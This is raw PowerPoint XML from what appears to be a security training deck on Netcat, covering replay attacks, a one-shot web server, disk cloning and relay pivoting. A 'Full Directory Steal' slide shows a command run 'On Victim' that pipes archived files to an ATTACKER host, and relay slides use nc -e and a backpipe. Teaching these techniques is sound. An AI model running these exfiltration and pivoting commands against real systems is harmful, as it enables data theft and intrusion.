              <a:t>–v –r –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>w3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>START_PORT-END_PORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40225510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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Replay Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Capture data with Sniffer / Listening Netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Modify it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>at modified_file | nc TARGET_IP PORT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc TARGET_IP PORT &lt; modified_file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat One Shot WebServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo -ne "HTTP/1.0 200 OK\r\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-Length: $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> -c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>some.file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)\r\n\r\n"; cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>some.file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; } | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11480434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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Full Directory Steal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>On Victim: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tar –cvf | bzip –z | nc ATTACKER PORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>On Attacker:	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp PORT | bzip –d | tar –xvf -</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Device Clone</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>On Machine 1: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> PORT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>On Machine 2: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> MACHINE_1 PORT | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> of=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sda</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17153437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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2209800"/>
            <a:ext cx="2362200" cy="2286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t>Machine 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> RELAY 1234</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2209800"/>
            <a:ext cx="2362200" cy="2286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t>Relay Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 1234 | </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> MACHINE_2 5678</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="2209800"/>
            <a:ext cx="2286000" cy="2286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t>Machine 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 5678</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2667000"/>
            <a:ext cx="4343400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="560F1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250241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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (3 Netcat Approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 | nc next_hop 22222 | nc previous_hop 33333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Netcat 2D Relay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(Window Batch File)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo nc next_hop 22222 &gt; nc_relay.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 –e nc_relay.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Why not this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 –e nc next_hop 22222</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27955516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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (Unix Inetd approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Modify /etc/inetd.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc next_hop 22222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
              <a:t>Netcat 2D Relay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(Unix Backpipe approach)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>c –lp 11111 0&lt;backpipe | nc next_hop 22222 1&gt;backpipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19774114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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
